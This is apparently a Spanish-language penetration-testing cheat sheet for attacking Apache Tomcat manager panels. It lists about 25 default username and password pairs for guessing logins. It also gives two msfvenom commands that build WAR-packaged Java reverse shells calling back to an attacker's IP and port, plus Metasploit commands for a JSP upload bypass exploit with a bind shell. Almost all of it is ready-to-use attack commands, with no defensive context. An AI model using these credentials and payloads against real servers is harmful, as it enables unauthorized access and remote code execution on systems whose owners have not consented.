Acceso por defecto al portal #
Con una instalación por defecto de tomcat, al intentar entrar al panel de administración, si no sabemos la contraseña, al pulsar en cancel, por defecto nos redirige a un fichero que dice: 401 Unauthorized y más abajo nos muestra el usuario y contraseña
Credenciales por defecto #
| Username | Password |
|---|---|
| admin | password |
| admin | |
| admin | Password1 |
| admin | password1 |
| admin | admin |
| admin | tomcat |
| both | tomcat |
| manager | manager |
| role1 | role1 |
| role1 | tomcat |
| role | changethis |
| root | Password1 |
| root | changethis |
| root | password |
| root | password1 |
| root | r00t |
| root | root |
| root | toor |
| tomcat | tomcat |
| tomcat | s3cret |
| tomcat | password1 |
| tomcat | password |
| tomcat | |
| tomcat | admin |
| tomcat | changethis |
Reverse shell tomcat con msfvenom #
Método 1 #
msfvenom -p java/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war -o revshell.war
Método 2 #
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war -o revshell.war
JSP Payload (metasploit) #
use exploit/multi/http/tomcat_jsp_upload_bypass
set payload java/jsp_shell_bind_tcp